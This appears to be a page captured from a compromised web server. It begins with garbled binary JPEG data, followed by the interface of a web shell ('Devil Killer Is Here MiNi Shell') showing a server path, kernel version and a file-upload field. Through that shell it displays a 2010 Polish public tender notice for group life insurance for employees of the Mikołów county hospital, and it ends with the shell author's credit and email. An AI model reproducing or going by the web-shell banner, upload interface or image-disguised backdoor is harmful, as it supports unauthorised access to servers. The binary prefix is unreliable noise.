JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101130/341813-N-2010.html

<p class="kh_header"><b>Mikołów: Ubezpieczenie grupowe na życie pracowników
Centrum Zdrowia w Mikołowie Sp. z o.o. -  NZOZ Szpital Powiatowy w Mikołowie</b><br>
<b>Numer ogłoszenia: 341813 - 2010; data zamieszczenia: 30.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Zdrowia w Mikołowie Sp. z o.o. - NZOZ Szpital Powiatowy w Mikołowie , ul. Waryńskiego 2, 43-190 Mikołów, woj. śląskie, tel. 032 3257639, faks 032 2260860.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-mikolow.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: NZOZ.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Ubezpieczenie grupowe na życie pracowników
Centrum Zdrowia w Mikołowie Sp. z o.o. -  NZOZ Szpital Powiatowy w Mikołowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Zamówieniem objęte jest ubezpieczenie grupowe na życie pracowników ich współmałżonków oraz pełnoletnich dzieci przez okres 12 miesięcy. 
	CPV: 66510000-8 usługi ubezpieczeniowe, 66511000-5 usługi ubezpieczeń na życie
2.	Okres ubezpieczenia od 01.02.2011 do 31.01.2012
3.	Struktura wiekowo-płciowa pracowników i ubezpieczonych grupowym ubezpieczeniem na życie w chwili ogłoszenia zamówienia przedstawia się następująco:  
3.1. Struktura zatrudnienia - wiek i płeć pracowników zatrudnionych przez Zamawiającego określono w SIWZ
3.2. Liczba pracowników, współmałżonków, pełnoletnich dzieci aktualnie ubezpieczonych określono w SIWZ
4.	Upoważnionymi do przystąpienia do ubezpieczenia będą pracownicy obecni, przyszli oraz ich współmałżonkowie, którzy nie ukończyli 69 roku życia i pełnoletnie dzieci. 
Przewidywana*, maksymalna ilość osób zainteresowanych przystąpieniem do ubezpieczenia grupowego to:
4.1. pracownicy (w tym współmałżonkowie, pełnoletnie dzieci) - 200osób  
*określenie przewidywanej ilości osób zainteresowanych przystąpieniem do ubezpieczenia grupowego służyć będzie wyłącznie do porównania ofert. Zamawiający zastrzega jednocześnie, że podane powyżej przewidywane ilości osób są ilościami maksymalnymi. 
W przypadku pojawienia się konieczności ubezpieczenia większej ilości osób, Zamawiający przewiduje możliwość udzielania zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 6 ustawy pzp, polegających na powtórzeniu tego samego rodzaju zamówień, stanowiących nie więcej niż 50% wartości zamówienia podstawowego, zgodnych z przedmiotem zamówienia podstawowego. Liczba maksymalna do 50 osób.  
5.	Zamawiający przyjmuje, że średnia przystępowalność do ubezpieczenia kształtować się będzie na poziomie stanu ubezpieczonych w dniu ogłoszenia zamówienia (pkt. 3. 2.), jednakże nie gwarantuje przystępowalności wszystkich uprawnionych do przystąpienia do ubezpieczenia jak również poziomu ich przystępowalności.
6.	W trakcie okresu ubezpieczenia osoba ubezpieczona będzie mogła odstąpić od ubezpieczenia przez złożenie stosownego wniosku. Odstąpienie będzie skutkować końcem ochrony ubezpieczeniowej z upływem ostatniego dnia miesiąca ochrony za jaki przekazano składkę. 
W takim przypadku Zamawiający  nie będzie zobowiązany do opłaty składki za odstępującego po okresie ustania ochrony z tytułu złożonego wniosku o rezygnacji.
7.	Karencja - w stosunku do osób 
a.	objętych ubezpieczeniem w chwili podpisania umowy ubezpieczenia,
b.	 jak również osób, które złożyły deklarację przystąpienia do ubezpieczenia przed upływem 3 miesięcy liczonych od daty początku ochrony ubezpieczenia,
c.	bądź osób, które w trakcie trwania ubezpieczenia nabyły prawo do przystąpienia do ubezpieczenia przez nawiązanie stosunku prawnego z Zamawiającym i złożyły deklarację przystąpienia do ubezpieczenia w terminie do  3 miesięcy 
 karencji nie stosuje się. 
8.	Należna składka za ubezpieczenie grupowe płatna będzie miesięcznie a jej wysokość nie może przekroczyć 60,00 zł dla każdego z wariantu /dla PAKIEU NR I PAKIETU NR 2 z osobna.  
a.	Wysokość składki miesięcznej dla jednego ubezpieczonego będzie niezmienna przez cały okres realizacji zamówienia.
b.	Składka miesięczna łączna za wszystkich ubezpieczonych będzie płatna przez okres realizacji zamówienia w cyklu miesięcznym. Składki będą przekazywane z góry, w terminie do 20-go dnia okresu, za który są należne. Składka płacona będzie jednym przelewem na konto bankowe Wykonawcy. Wykonawca udzieli prolongaty w terminie wniesienia składki za pierwszy miesiąc ubezpieczenia  do 10-go następnego miesiąca.
9.	Zamawiający poinformuje Wykonawcę w terminie 1 miesiąca od podpisania umowy ubezpieczenia o danych osoby, która będzie prowadzić bieżącą obsługę umowy ubezpieczenia. Wykonawca przez cały okres trwania umowy ubezpieczenia zobowiązuje się do przekazywania osobie wskazanej przez Zamawiającego wynagrodzenia za bieżącą obsługę umowy ubezpieczenia w wysokości 6% inkasa miesięcznego.
10.	Wykonawca zapewni orzekanie komisji lekarskich o stopniu uszczerbku na zdrowiu ubezpieczonych na terenie Zamawiającego tj. miasta Mikołów.
11.	Do przetargu przystąpić mogą Wykonawcy, którzy posiadają placówkę, oddział, filię, inspektorat na terenie województwa śląskiego, którego pracownicy są upoważnieni do reprezentowania Wykonawcy, a w szczególności do przyjmowania dokumentacji, zgłoszeń szkód, potwierdzenia dokumentów za zgodność z oryginałem itp. czynności niezbędnych do sprawnej obsługi ubezpieczonych w zakresie szkodowym. Dodatkowo Wykonawca zobowiązany będzie do wyznaczenia opiekuna merytorycznego przypisanego do obsługi programu i kontaktów z Zamawiającym. 
12.	Wykonawca zobowiązany jest do zapewnienia narzędzia elektronicznego do komunikacji pomiędzy Zamawiającym, a Wykonawcą w zakresie bieżącej obsługi ubezpieczenia.
13.	Wykonawca, którego oferta zostanie wybrana za najkorzystniejszą zobowiązuje się do przekazania Zamawiającemu materiałów reklamowych, informacyjnych o programie, druków deklaracji ubezpieczenia, ogólnych warunków ubezpieczenia oraz zobowiązuje się do stawienia na żądanie Zamawiającego w jego siedzibie celem udzielenia wyjaśnień związanych z ofertą i sposobem wypełnienia deklaracji.
14.	Ubezpieczenie powinno obejmować co najmniej katalog świadczeń z sumą ubezpieczenia nie niższą niż określone w SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielania zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 6 ustawy pzp, polegających na powtórzeniu tego samego rodzaju zamówień, stanowiących nie więcej niż 50% wartości zamówienia podstawowego, zgodnych z przedmiotem zamówienia podstawowego. Liczba maksymalna do 50 osób</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 66.51.00.00-8, 66.51.10.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.01.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>aktualne zezwolenie lub inny dokument właściwego organu umożliwiający prowadzenie 	działalności ubezpieczeniowej na terenie Rzeczypospolitej Polskiej we wszystkich grupach 	ryzyk, których dotyczy przedmiot zamówienia tj. prowadzenie działalności ubezpieczeniowej, 	o której mowa w Dziale I załącznika do ustawy o działalności ubezpieczeniowej z 22 maja 	2003r (t.j. Dz.U.2010.11.66)
Ocena spełniania poszczególnych warunków przez Wykonawców zostanie dokonana na podstawie  złożonych dokumentów i oświadczeń, wymaganych przez Zamawiającego i zostanie przeprowadzona zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	wypełniony i podpisany formularz ofertowy
b)	Ogólne Warunki Ubezpieczenia w zakresie poszczególnych rodzajów ryzyk/zdarzeń 	wchodzących w skład zamówienia, obowiązujące na czas wykonywania umowy ubezpieczenia
c)	treść ewentualnych klauzul, dodatków lub załączników, którymi Wykonawca 	uzupełnia/rozszerza Ogólne Warunki Ubezpieczenia
d)	jeżeli oferta podpisana jest przez osobę inną niż upoważniona do reprezentowania wykonawcy 	do oferty należy załączyć pełnomocnictwo/upoważnienie w formie oryginału podpisane przez 	osoby uprawnione do reprezentowania wykonawcy albo kopii poświadczonej za zgodność z 	oryginałem przez notariusza
e)	w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia 	pełnomocnictwo dla pełnomocnika wykonawców występujących wspólnie do reprezentowania 	ich w postępowaniu o udzielenie zamówienia  albo reprezentowania w postępowaniu i 	zawarcia umowy  w sprawie zamówienia publicznego. Pełnomocnictwo musi być w formie 	oryginału lub w formie kopii poświadczonej za zgodność z oryginałem przez notariusza</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 30</li>
<li>2 - wysokość świadczeń - 70</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital-mikolow.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centrum Zdrowia w Mikołowie Sp. z o.o. - NZOZ Szpital Powiatowy w Mikołowie
ul. Waryńskiego 2, 43-190 Mikołów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.12.2010 godzina 10:00, miejsce: SEKRETARIAT
Centrum Zdrowia w Mikołowie Sp. z o.o. - NZOZ Szpital Powiatowy w Mikołowie
ul. Waryńskiego 2, 43-190 Mikołów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com